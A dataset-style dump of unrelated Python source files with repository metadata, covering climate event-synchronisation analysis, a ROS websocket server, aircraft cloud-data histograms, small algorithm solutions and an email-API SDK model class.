"[email protected]"
] | |
86024511a554590ea7ae122070eab0f619c43d93 | 4fd5860beb1e6809eee297509bcc776dfca40aca | /event_synchronization_analysis/ed_lf_es_mc.py | cab4b7d9f4e05674b37592ab836218dde4a38ed7 | [] | no_license | manmeet3591/fingerprint-volcano-enso-im | 40a41eca517abdd09079feb7ae58cc866343d6a8 | 21f39125ece4d03c5ee2961e4aae3768ee61cdb8 | refs/heads/master | 2021-07-05T09:49:28.858614 | 2021-04-19T02:55:45 | 2021-04-19T02:55:45 | 229,057,834 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,004 | py |
# coding: utf-8
# In[1]:
from __future__ import print_function, division
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import datetime as dt
import warnings
import random
warnings.filterwarnings("ignore")
sns.set()
# In[2]:
nino3 = np.genfromtxt ('tas_Amon_IPSL-CM5A-LR_past1000_r1i1p1_0850_1850_1_nino3_tseries.csv', delimiter=",")
ismr = np.genfromtxt ('pr_Amon_IPSL-CM5A-LR_past1000_r1i1p1_0850_1850_india_goswami_2002_tseries.csv', delimiter=",")
vrf = np.genfromtxt ('sigl.txt', delimiter=",")
print(nino3.shape)
print(ismr.shape)
print(vrf.shape)
# In[3]:
def common_time_axis(dismr, verbose=True):
"""
Generates common time axis for Nino3 and ISMR time series.
"""
# generate the time axis
Nt = len(dismr)
time = [dt.datetime(850, 1, 15)]
for i in range(1, len(dismr)):
y = time[i - 1].year
m = time[i - 1].month
if m == 12:
y += 1
m = 0
time.append(dt.datetime(y, m + 1, 15))
time = np.array(time)
return time
def yearly_time_axis(dvolc, verbose=True):
"""
Generates time axis for yearly data
"""
Nt = len(dvolc)
time = [dt.datetime(900, 1, 15)]
for i in range(1, len(dvolc)):
y = time[i - 1].year
y += 1
time.append(dt.datetime(y, 1, 15))
time = np.array(time)
return time
def moving_average_anomaly(dismr,n=360):
"""
Generates moving average anomaly of long time series
"""
#print(dismr.shape)
dismr_anom = np.zeros((dismr.shape[0]))
dismr_std = np.zeros((dismr.shape[0]))
dismr_anom[0:n/2] = ( dismr[0:n/2] - np.mean(dismr[0:n]) )/np.std(dismr[0:n])
dismr_anom[dismr.shape[0]-n/2:] = ( dismr[dismr.shape[0]-n/2:] - np.mean(dismr[dismr.shape[0]-n:]) )/np.std(dismr[dismr.shape[0]-n:])
#print(dismr_anom)
dismr_std[0:n/2] = np.std(dismr[0:n])
dismr_std[dismr.shape[0]-n/2:] = np.std(dismr[dismr.shape[0]-n:])
for i in range(np.int(n/2),np.int(dismr.shape[0]-n/2)):
dismr_anom[i] = (dismr[i] - np.mean(dismr[i-n/2:i+n/2]))/np.std(dismr[i-n/2:i+n/2])
dismr_std[i] = np.std(dismr[i-n/2:i+n/2])
return dismr_anom, dismr_std
def EventSync(es1, es2, taumax):
"""
Compute non-vectorized event synchronization
:type es1: 1D Numpy array
:arg es1: Event series containing '0's and '1's
:type es2: 1D Numpy array
:arg es2: Event series containing '0's and '1's
:float return: Event synchronization es2 to es1
"""
ex = np.arange(len(es1))[es1 == 1]
ey = np.arange(len(es2))[es2 == 1]
lx = len(ex)
ly = len(ey)
count = 0
if lx!=0 and ly!=0:
for m in range(1, lx-1):
for n in range(1, ly-1):
dst = ex[m] - ey[n]
if abs(dst) > taumax:
continue
elif dst == 0:
count += 0.5
continue
# finding the dynamical delay tau
tmp = ex[m+1] - ex[m]
if tmp > ex[m] - ex[m-1]:
tmp = ex[m] - ex[m-1]
tau = ey[n+1] - ey[n]
if tau > ey[n] - ey[n-1]:
tau = ey[n] - ey[n-1]
if tau > tmp:
tau = tmp
tau = tau / 2
if dst > 0 and dst <= tau:
count += 1
#print("count = ",count)
#print("Q = ",np.sqrt((lx-2) * (ly-2)))
#print("lx,ly,Q =",lx,ly,count)
if lx!=0 and ly!=0:
return count / np.sqrt((lx) * (ly))
#return count / np.sqrt((lx-2) * (ly-2))
else:
return 0.0
def my_shuffle(array):
random.shuffle(array)
return array
# In[12]:
ismr_anom, ismr_std = moving_average_anomaly(ismr)
nino3_anom, nino3_std = moving_average_anomaly(nino3)
es_ismr_d = np.zeros((ismr_anom.shape[0]))
es_ismr_f = np.zeros((ismr_anom.shape[0]))
es_nino3_en = np.zeros((nino3_anom.shape[0]))
es_nino3_ln = np.zeros((nino3_anom.shape[0]))
es_ismr_f[ismr_anom>1.0] = 1.0
es_ismr_d[ismr_anom<-1.0] = 1.0
es_nino3_en[nino3_anom>0.5] = 1.0
es_nino3_ln[nino3_anom<-0.5] = 1.0
taumax = 24
# In[13]:
Q_hist_ed = np.zeros((es_ismr_d.shape[0]-taumax))
Q_hist_lf = np.zeros((es_ismr_d.shape[0]-taumax))
es_ismr_d_mc = my_shuffle(es_ismr_d)
es_ismr_f_mc = my_shuffle(es_ismr_f)
for i in range(es_ismr_d.shape[0]-taumax):
Q_hist_12 = EventSync(es_ismr_d[i:i+taumax], es_nino3_en[i:i+taumax], taumax)
Q_hist_21 = EventSync(es_nino3_en[i:i+taumax], es_ismr_d[i:i+taumax],taumax)
Q_hist_ed[i] = Q_hist_12 + Q_hist_21
Q_hist_12 = EventSync(es_ismr_f[i:i+taumax], es_nino3_ln[i:i+taumax], taumax)
Q_hist_21 = EventSync(es_nino3_ln[i:i+taumax], es_ismr_f[i:i+taumax],taumax)
Q_hist_lf[i] = Q_hist_12 + Q_hist_21
# In[15]:
np.savetxt("Q_hist_ed.csv", Q_hist_ed, delimiter=",")
np.savetxt("Q_hist_lf.csv", Q_hist_lf, delimiter=",")
# In[27]:
| [
"[email protected]"
] | |
03a9dfea771fb783bbd10950701d0049f6fa4eb3 | b76e39e535499704368eddc26237dc0016ef7d06 | /RailRites/allsiemensdriveprocessing.py | a9963fed91147d1a03a027d0f56cd7e4d6f3f9fa | [] | no_license | BUBAIMITRA2018/castersimulation | 0532e53df7d346c2824e577cc91cd0ac2ce4694c | eca5fddff5c0f33f785168f6b1e9f572c1622be0 | refs/heads/master | 2022-12-10T02:45:04.207196 | 2020-09-09T05:35:54 | 2020-09-09T05:35:54 | 260,110,682 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,309 | py |
from observable import *
import logging
from clientcomm_v1 import *
from readgeneral_v2 import *
logger = logging.getLogger("main.log")
threadlist = []
class AreaObserver:
def __init__(self, observable):
observable.register_observer(self)
def notify(self, *args, **kwargs):
for item in args[0]:
try:
# threading = multiprocessing.Process(target=self.callmotor2dprocess,args=(item))
thread = threading.Thread(target=self.callsiemendsdriveprocess, args=[item])
threadlist.append(thread)
except Exception as e:
level = logging.INFO
messege = "NOTIFY" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def callsiemendsdriveprocess(self, item):
while True:
try:
item.driveprocess
except Exception as e:
level = logging.INFO
messege = "calldriveprocess" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def __init__(self, alldevices, filename):
self.subject = Observable()
self.alldevices = alldevices
self.client = Communication()
self.sta_con_plc = self.client.opc_client_connect(filename)
self.observer = AreaObserver(self.subject)
self.readgeneral = ReadGeneral(self.sta_con_plc)
def process(self, filename):
try:
for area, devices in readkeyandvalues(self.alldevices):
areavalue = self.readgeneral.readsymbolvalue(area, 'S7WLBit', 'PA')
if areavalue == 1:
self.observer.notify(devices, filename)
for j in threadlist:
j.start()
except Exception as e:
level = logging.INFO
messege = "PROCCESS" + ":" + " Exception rasied(process): " + str(e.args) + str(e)
logger.log(level, messege)
def readkeyandvalues(alldevice):
siemensdrivedictionary = alldevice.allsiemensdrives.dictionary
areas = list(siemensdrivedictionary.keys())
n = 0
while n < len(areas):
area = areas[n]
devices = siemensdrivedictionary[area]
yield area,devices
n = n + 1
| [
"[email protected]"
] | |
29156ba1d65e04552c8a58d16cf74743e89ed231 | f820d23a92ea5050b9bd6d9eff346532bf64a950 | /cucumber.py | 5b8360d11e34242043045d1d1722155d084ada17 | [] | no_license | aidardarmesh/behave | af84cb42c6e7fa3b1b45ff1ed424341dba1aec62 | 64aa16af5ee8c0b8b68ce56fad6237abe81551ec | refs/heads/master | 2022-11-30T16:15:54.914006 | 2020-08-12T17:35:33 | 2020-08-12T17:35:33 | 287,071,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | class Basket:
def __init__(self, initial_weight):
self.weight = initial_weight
| [
"[email protected]"
] | |
ee0bc5029cbb3d92a0311e726a37acbb4ac87617 | 6601acd5ba7aaaa11f8620df9509e951574373b4 | /aircraft_comparisons/make_1D_histograms.py | bbdbf982f6c812b8a0ea1ad7599d3578d647ec37 | [] | no_license | rachawker/Hawker_ACP_2021-UM_CASIM_paper | 852d07519e4c15791e38bdf8ba7ae4ee9ac3707c | ff3cdd0b1ff72b0fed477824679ab7da49976aa3 | refs/heads/main | 2023-04-07T20:23:16.738292 | 2021-04-22T13:07:22 | 2021-04-22T13:14:40 | 360,516,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,512 | py |
from __future__ import division
import matplotlib.gridspec as gridspec
import iris
#import iris.coord_categorisation
import iris.quickplot as qplt
import cartopy
import cartopy.feature as cfeat
import rachel_dict as ra
#import iris # library for atmos data
import cartopy.crs as ccrs
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import copy
import matplotlib.colors as cols
import matplotlib.cm as cmx
import matplotlib._cntr as cntr
from matplotlib.colors import BoundaryNorm
import netCDF4
import matplotlib.ticker as mticker
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
import os,sys
#scriptpath = "/nfs/a201/eereh/scripts/2D_maps_of_column_max_reflectivity/"
#sys.path.append(os.path.abspath(scriptpath))
import colormaps as cmaps
from matplotlib.patches import Polygon
from mpl_toolkits.basemap import Basemap
import sys
import UKCA_lib as ukl
import glob
import netCDF4 as nc
import scipy.ndimage
import rachel_lists as rl
air_up = ra.read_in_nc_variables(rl.air_updraft_file, rl.air_updraft_var)
air_TWC = ra.read_in_nc_variables(rl.air_TWC_file, rl.air_TWC_var)
air_CDNC = ra.read_in_nc_variables(rl.air_CDNC_file, rl.air_CDNC_var)
air_2ds = ra.read_in_nc_variables(rl.air_2ds_file,rl.air_2ds_var)
air_alt = ra.read_in_nc_variables(rl.air_alt_file,rl.air_alt_var)
air_iwc = ra.read_in_nc_variables(rl.air_iwc_file,rl.air_iwc_var)
air_lwc = ra.read_in_nc_variables(rl.air_lwc_file,rl.air_lwc_var)
air_temp = ra.read_in_nc_variables(rl.air_temp_file,rl.air_temp_var)
print len(air_up)
data_path = sys.argv[1]
model_path = data_path
TWC = ra.read_in_nc_variables(data_path+rl.TWC_3D_file,rl.TWC_3D_var)
TWC = TWC*1000
updrafts = ra.read_in_nc_variables(data_path+rl.UPDRAFT_3D_file,rl.UPDRAFT_3D_var)
print len(updrafts)
CDNC = ra.read_in_nc_variables(data_path+rl.CDNC_3D_file,rl.CDNC_3D_var)
CDNC = CDNC*1e-6
IWC = ra.read_in_nc_variables(data_path+rl.IWC_3D_file,rl.IWC_3D_var)
IWC=IWC*1000
LWC = ra.read_in_nc_variables(data_path+rl.LWC_3D_file,rl.LWC_3D_var)
LWC=LWC*1000
ALT = ra.read_in_nc_variables(data_path+rl.ALT_3D_file,rl.ALT_3D_var)
TEMP = ra.read_in_nc_variables(data_path+rl.TEMP_3D_file,rl.TEMP_3D_var)
ICE_NUMBER = ra.read_in_nc_variables(data_path+rl.ICE_NUMBER_3D_file,rl.ICE_NUMBER_3D_var)
ICE_NUMBER = ICE_NUMBER*1e-6
GRAUPEL_NUMBER = ra.read_in_nc_variables(data_path+rl.GRAUPEL_NUMBER_3D_file,rl.GRAUPEL_NUMBER_3D_var)
GRAUPEL_NUMBER = GRAUPEL_NUMBER*1e-6
SNOW_NUMBER = ra.read_in_nc_variables(data_path+rl.SNOW_NUMBER_3D_file,rl.SNOW_NUMBER_3D_var)
SNOW_NUMBER = SNOW_NUMBER*1e-6
TOTAL_ICE_NUMBER = ICE_NUMBER+GRAUPEL_NUMBER+SNOW_NUMBER
CDNC_cloud_base = ra.read_in_nc_variables(data_path+rl.CLOUD_BASE_DROPLET_NUMBER_2D_file, rl.CLOUD_BASE_DROPLET_NUMBER_var)
CDNC_cloud_base = CDNC_cloud_base*1e-6
updraft_cloud_base = ra.read_in_nc_variables(data_path+rl.CLOUD_BASE_UPDRAFT_2D_file, rl.CLOUD_BASE_UPDRAFT_var)
ra.plot_1d_histogram_aircraft_and_model(air_up,updrafts,'Updraft Speed (m/s)', 'Updrafts_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_TWC,TWC,'TWC (g/kg)', 'TWC_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_CDNC,CDNC,'CDNC (/cm^3)', 'CDNC_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_CDNC,CDNC_cloud_base,'CDNC at cloud base (/cm^3)', 'CDNC_at_cloud_base_1D_histogram_new_RC_data', model_path)
TWC[TWC>3]=0
TWC[TWC==0]=np.nan
TWC = TWC[~np.isnan(TWC)]
ra.plot_1d_histogram_aircraft_and_model(air_TWC,TWC,'TWC (g/kg)', 'TWC_1D_histogram_new_RC_data_3gperkg_limit', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_lwc,LWC,'LWC (g/kg)', 'LWC_CDP_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_iwc,IWC,'IWC (g/kg)', 'IWC_NEVZOROV_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,ICE_NUMBER,'Ice number / 2ds count (/cm^3)', 'ICE_CRYSTAL_NUMBER_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,TOTAL_ICE_NUMBER,'Ice number / 2ds count (/cm^3)', 'TOTAL_ICE_NUMBER_1D_histogram_new_RC_data', model_path)
ra.plot_1d_histogram_aircraft_and_model(air_2ds,TOTAL_ICE_NUMBER[ALT<8000],'Ice number / 2ds count (<8000m) (/cm^3)', 'TOTAL_ICE_NUMBER_model_under_8000m_1D_histogram_new_RC_data', model_path)
| [
"[email protected]"
] | |
83c8ab86e6e3a8b6764880c6ff5d8c569fa8a7b8 | 2612f762ec75a0723a4d12ae1d63a30792e4c236 | /src/websocket_server/src/ws_ros.py~ | f804ffdceb5f6c972b0265f5cf2bc6bfa41642a3 | [] | no_license | aransena/catkin_ws | efdf1a52b7dbbefbfa9cb748630f7be1ffd7f628 | eae6b83c80803a718a8e41569d3b4e7c1c838926 | refs/heads/master | 2021-01-18T21:12:48.557260 | 2016-06-03T13:39:22 | 2016-06-03T13:39:22 | 52,208,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,602 | #!/usr/bin/env python
# sample code from http://iot-projects.com/index.php?id=websocket-a-simple-example
import rospy
from std_msgs.msg import String as ros_string
import tornado.httpserver
import tornado.websocket
import tornado.ioloop
import tornado.web
import json
pub = rospy.Publisher('websocket_server_msgs', ros_string)
outfile = open('data.txt', 'w')
class WSHandler(tornado.websocket.WebSocketHandler):
def check_origin(self, origin):
return True
def open(self):
print 'user is connected.\n'
def on_message(self, message):
print message
if len(message) > 10:
msg = json.loads(message)
json.dump(msg, outfile)
#print 'received message: %s\n' % json.loads(message)
pub.publish(str(message))
if message == "USER":
print "Responding..."
self.write_message(message) # + ' OK')
def on_close(self):
print 'connection closed\n'
application = tornado.web.Application([(r'/ws', WSHandler), ])
if __name__ == "__main__":
try:
pub = rospy.Publisher('websocket_server_msgs', ros_string)
rospy.init_node('websocket_server', anonymous=True)
rospy.loginfo("websocket_server started")
http_server = tornado.httpserver.HTTPServer(application)
try:
print(2)
#http_server.close_all_connections()
print(3)
except:
pass
http_server.listen(8888)
tornado.ioloop.IOLoop.instance().start()
except Exception,e:
print "Server Error ", e
pass
| [
"[email protected]"
] | ||
31e398f160b1e7e9561e782bfa7d7d1eb3c10ec1 | dea48ecac82d241e7960f52794eb8a29e5d2e428 | /jianzhioffer/二叉树/字符串验证是否树的前序遍历.py | 0947369b674e63e6e19fb50a48bf9bcedce51ce0 | [] | no_license | yxx94/2020- | e2302bed32c5d7d1e8b559ef378fc60408687934 | e63431cfc3d8c8903bb383144dd0c5ed5d71aa5c | refs/heads/master | 2020-09-03T09:04:08.795099 | 2019-09-19T08:12:51 | 2019-09-19T08:12:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | # coding=utf-8
# 字符串验证是否树的前序遍历
'''
//遍历一边str[]
//如果不是"#"就会多出一个叶子结点,如果是"#"就会减少一个叶子结点
输入: "9,3,4,#,#,1,#,#,2,#,6,#,#"
输出: true
'''
class Solution(object):
def isValidSerialization(self, preorder):
res = 1 # 叶节点的个数
for val in preorder.split(','):
if not res:
return False
if val == "#":
res -= 1
else:
res += 1
return not res
s = Solution()
print(s.isValidSerialization('9,3,4,#,#,1,#,#,2,#,6,#,#'))
| [
"[email protected]"
] | |
2eed8db45422d9c88538efb423a9a4754c1887e2 | 3a21faa925e8a21ad5e0d6dedf3037cc52750cbd | /datasciencebox/tests/test_cluster.py | 89b93a7e9fa3876d1158ec3b5b928d7a7a92c6fe | [
"Apache-2.0"
] | permissive | yabebalFantaye/datasciencebox | 9e630f9ad9139a609d9d925ce4a3f29467bf661f | 9f57ae85a034357d5bc15a12f3ebd15930f33ff1 | refs/heads/master | 2021-01-15T18:14:01.730969 | 2015-09-06T05:42:23 | 2015-09-06T05:42:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 693 | py | import pytest
from datasciencebox.core.settings import Settings
from datasciencebox.core.cloud.cluster import Cluster
settings = Settings()
def test_cluster_from_to_list():
data = [{'id': 0, 'ip': '0.0.0.0'}, {'id': 1, 'ip': '1.1.1.1'}, {'id': 2, 'ip': '2.2.2.2'}]
cluster = Cluster.from_list(data, settings)
exported = cluster.to_list()
exported_ans = [{'id': 0,
'ip': '0.0.0.0'}, {'id': 1,
'ip': '1.1.1.1'}, {'id': 2,
'ip': '2.2.2.2'}]
assert isinstance(exported, list)
assert exported == exported_ans
assert len(cluster.instances) == 3
| [
"[email protected]"
] | |
6e21f862d7e958f80ed264d9ffd7489494b638db | d9f52125601ec26f79202f0e912891b31b60ffc4 | /오후반/Sets/3_Set_union_Operation/3_Set_union_Operation_LGY.py | c79cb4088243b817c276b33d76d8101e5cfec87e | [] | no_license | YoungGaLee/2020_Python_coding-study | 5a4f36a39021c89ac773a3a7878c44bf8b0b811f | b876aabc747709afa21035c3afa7e3f7ee01b26a | refs/heads/master | 2022-12-12T13:34:44.729245 | 2020-09-07T04:07:48 | 2020-09-07T04:07:48 | 280,745,587 | 4 | 4 | null | 2020-07-22T03:27:22 | 2020-07-18T21:51:40 | Python | UTF-8 | Python | false | false | 135 | py | first = int(input())
A = set(input().split())
second = int(input())
B = set(input().split())
result = A.union(B)
print(len(result))
| [
"[email protected]"
] | |
78e205ae750a4be5a068a55c9c559e1374f631e3 | 03a2c1eb549a66cc0cff72857963eccb0a56031d | /hacker_rank/domains/algorithms/sorting/almost-sorted_sunghyo.jung.py | 0264ebbc94a8388fd6ffbfafa0b6f4d7256e3e34 | [] | no_license | nobe0716/problem_solving | c56e24564dbe3a8b7093fb37cd60c9e0b25f8e59 | cd43dc1eddb49d6b5965419e36db708c300dadf5 | refs/heads/master | 2023-01-21T14:05:54.170065 | 2023-01-15T16:36:30 | 2023-01-15T16:36:30 | 80,906,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | n = int(input())
ar = map(int, raw_input().split())
d = []
for i in range(1, n):
if ar[i] < ar[i - 1]:
d.append(i)
if len(d) == 1:
a, b = d[0] - 1, d[0]
ar[a], ar[b] = ar[b], ar[a]
if ar == sorted(ar):
print("yes")
print("swap %d %d" % (a + 1, b + 1))
else:
print("no")
elif len(d) == 2:
a, b = d[0] - 1, d[1]
ar[a], ar[b] = ar[b], ar[a]
if ar == sorted(ar):
print("yes")
print("swap %d %d" % (a + 1, b + 1))
else:
print("no")
else:
a = d[0] - 1
b = d[len(d) - 1]
if b - a != len(d):
print("no")
else:
print("yes")
print("reverse %d %d" % (a + 1, b + 1))
| [
"[email protected]"
] | |
4e8ad11d0b63d59fba4ed5c53a72136da7a90273 | 7c24607e5c201e9a6d4ab86bb89f5aa882aa65bf | /sib_api_v3_sdk/models/create_smtp_template.py | ec035dcd91cc45904777e8a6325c77808f609663 | [
"MIT"
] | permissive | SportPursuit/APIv3-python-library | f9c715f59ada2efce1f8ff69d167e71bfc71b598 | a615e09ccb59d78fd9baa9f45e1a70f2f882fe16 | refs/heads/master | 2021-05-10T13:19:41.566860 | 2017-12-27T10:59:34 | 2017-12-27T10:59:34 | 118,469,772 | 0 | 0 | null | 2018-01-22T14:42:32 | 2018-01-22T14:42:31 | null | UTF-8 | Python | false | false | 11,754 | py | # coding: utf-8
"""
SendinBlue API
SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed |
OpenAPI spec version: 3.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class CreateSmtpTemplate(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'tag': 'str',
'sender': 'CreateSmtpTemplateSender',
'template_name': 'str',
'html_content': 'str',
'html_url': 'str',
'subject': 'str',
'reply_to': 'str',
'to_field': 'str',
'attachment_url': 'str',
'is_active': 'bool'
}
attribute_map = {
'tag': 'tag',
'sender': 'sender',
'template_name': 'templateName',
'html_content': 'htmlContent',
'html_url': 'htmlUrl',
'subject': 'subject',
'reply_to': 'replyTo',
'to_field': 'toField',
'attachment_url': 'attachmentUrl',
'is_active': 'isActive'
}
def __init__(self, tag=None, sender=None, template_name=None, html_content=None, html_url=None, subject=None, reply_to=None, to_field=None, attachment_url=None, is_active=None):
"""
CreateSmtpTemplate - a model defined in Swagger
"""
self._tag = None
self._sender = None
self._template_name = None
self._html_content = None
self._html_url = None
self._subject = None
self._reply_to = None
self._to_field = None
self._attachment_url = None
self._is_active = None
if tag is not None:
self.tag = tag
if sender is not None:
self.sender = sender
self.template_name = template_name
if html_content is not None:
self.html_content = html_content
if html_url is not None:
self.html_url = html_url
self.subject = subject
if reply_to is not None:
self.reply_to = reply_to
if to_field is not None:
self.to_field = to_field
if attachment_url is not None:
self.attachment_url = attachment_url
if is_active is not None:
self.is_active = is_active
@property
def tag(self):
"""
Gets the tag of this CreateSmtpTemplate.
Tag of the template
:return: The tag of this CreateSmtpTemplate.
:rtype: str
"""
return self._tag
@tag.setter
def tag(self, tag):
"""
Sets the tag of this CreateSmtpTemplate.
Tag of the template
:param tag: The tag of this CreateSmtpTemplate.
:type: str
"""
self._tag = tag
@property
def sender(self):
"""
Gets the sender of this CreateSmtpTemplate.
:return: The sender of this CreateSmtpTemplate.
:rtype: CreateSmtpTemplateSender
"""
return self._sender
@sender.setter
def sender(self, sender):
"""
Sets the sender of this CreateSmtpTemplate.
:param sender: The sender of this CreateSmtpTemplate.
:type: CreateSmtpTemplateSender
"""
self._sender = sender
@property
def template_name(self):
"""
Gets the template_name of this CreateSmtpTemplate.
Name of the template
:return: The template_name of this CreateSmtpTemplate.
:rtype: str
"""
return self._template_name
@template_name.setter
def template_name(self, template_name):
"""
Sets the template_name of this CreateSmtpTemplate.
Name of the template
:param template_name: The template_name of this CreateSmtpTemplate.
:type: str
"""
if template_name is None:
raise ValueError("Invalid value for `template_name`, must not be `None`")
self._template_name = template_name
@property
def html_content(self):
"""
Gets the html_content of this CreateSmtpTemplate.
Body of the message (HTML version). The field must have more than 10 characters. REQUIRED if htmlUrl is empty
:return: The html_content of this CreateSmtpTemplate.
:rtype: str
"""
return self._html_content
@html_content.setter
def html_content(self, html_content):
"""
Sets the html_content of this CreateSmtpTemplate.
Body of the message (HTML version). The field must have more than 10 characters. REQUIRED if htmlUrl is empty
:param html_content: The html_content of this CreateSmtpTemplate.
:type: str
"""
self._html_content = html_content
@property
def html_url(self):
"""
Gets the html_url of this CreateSmtpTemplate.
Url which contents the body of the email message. REQUIRED if htmlContent is empty
:return: The html_url of this CreateSmtpTemplate.
:rtype: str
"""
return self._html_url
@html_url.setter
def html_url(self, html_url):
"""
Sets the html_url of this CreateSmtpTemplate.
Url which contents the body of the email message. REQUIRED if htmlContent is empty
:param html_url: The html_url of this CreateSmtpTemplate.
:type: str
"""
self._html_url = html_url
@property
def subject(self):
"""
Gets the subject of this CreateSmtpTemplate.
Subject of the template
:return: The subject of this CreateSmtpTemplate.
:rtype: str
"""
return self._subject
@subject.setter
def subject(self, subject):
"""
Sets the subject of this CreateSmtpTemplate.
Subject of the template
:param subject: The subject of this CreateSmtpTemplate.
:type: str
"""
if subject is None:
raise ValueError("Invalid value for `subject`, must not be `None`")
self._subject = subject
@property
def reply_to(self):
"""
Gets the reply_to of this CreateSmtpTemplate.
Email on which campaign recipients will be able to reply to
:return: The reply_to of this CreateSmtpTemplate.
:rtype: str
"""
return self._reply_to
@reply_to.setter
def reply_to(self, reply_to):
"""
Sets the reply_to of this CreateSmtpTemplate.
Email on which campaign recipients will be able to reply to
:param reply_to: The reply_to of this CreateSmtpTemplate.
:type: str
"""
self._reply_to = reply_to
@property
def to_field(self):
"""
Gets the to_field of this CreateSmtpTemplate.
This is to personalize the «To» Field. If you want to include the first name and last name of your recipient, add [FNAME] [LNAME]. To use the contact attributes here, these must already exist in SendinBlue account
:return: The to_field of this CreateSmtpTemplate.
:rtype: str
"""
return self._to_field
@to_field.setter
def to_field(self, to_field):
"""
Sets the to_field of this CreateSmtpTemplate.
This is to personalize the «To» Field. If you want to include the first name and last name of your recipient, add [FNAME] [LNAME]. To use the contact attributes here, these must already exist in SendinBlue account
:param to_field: The to_field of this CreateSmtpTemplate.
:type: str
"""
self._to_field = to_field
@property
def attachment_url(self):
"""
Gets the attachment_url of this CreateSmtpTemplate.
Absolute url of the attachment (no local file). Extensions allowed xlsx, xls, ods, docx, docm, doc, csv, pdf, txt, gif, jpg, jpeg, png, tif, tiff and rtf
:return: The attachment_url of this CreateSmtpTemplate.
:rtype: str
"""
return self._attachment_url
@attachment_url.setter
def attachment_url(self, attachment_url):
"""
Sets the attachment_url of this CreateSmtpTemplate.
Absolute url of the attachment (no local file). Extensions allowed xlsx, xls, ods, docx, docm, doc, csv, pdf, txt, gif, jpg, jpeg, png, tif, tiff and rtf
:param attachment_url: The attachment_url of this CreateSmtpTemplate.
:type: str
"""
self._attachment_url = attachment_url
@property
def is_active(self):
"""
Gets the is_active of this CreateSmtpTemplate.
Status of template. isActive = true means template is active and isActive = false means template is inactive
:return: The is_active of this CreateSmtpTemplate.
:rtype: bool
"""
return self._is_active
@is_active.setter
def is_active(self, is_active):
"""
Sets the is_active of this CreateSmtpTemplate.
Status of template. isActive = true means template is active and isActive = false means template is inactive
:param is_active: The is_active of this CreateSmtpTemplate.
:type: bool
"""
self._is_active = is_active
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, CreateSmtpTemplate):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"[email protected]"
] | |
70bbe8208649b16729cf28e1e4a6518b00610e12 | 0617c812e9bf58a2dbc1c1fef35e497b054ed7e4 | /venv/Lib/site-packages/pyrogram/raw/functions/account/check_username.py | d280838035783c8751c6caf5d199e15af0b780fc | [] | no_license | howei5163/my_framework | 32cf510e19a371b6a3a7c80eab53f10a6952f7b2 | 492c9af4ceaebfe6e87df8425cb21534fbbb0c61 | refs/heads/main | 2023-01-27T14:33:56.159867 | 2020-12-07T10:19:33 | 2020-12-07T10:19:33 | 306,561,184 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,138 | py | # Pyrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2020 Dan <https://github.com/delivrance>
#
# This file is part of Pyrogram.
#
# Pyrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
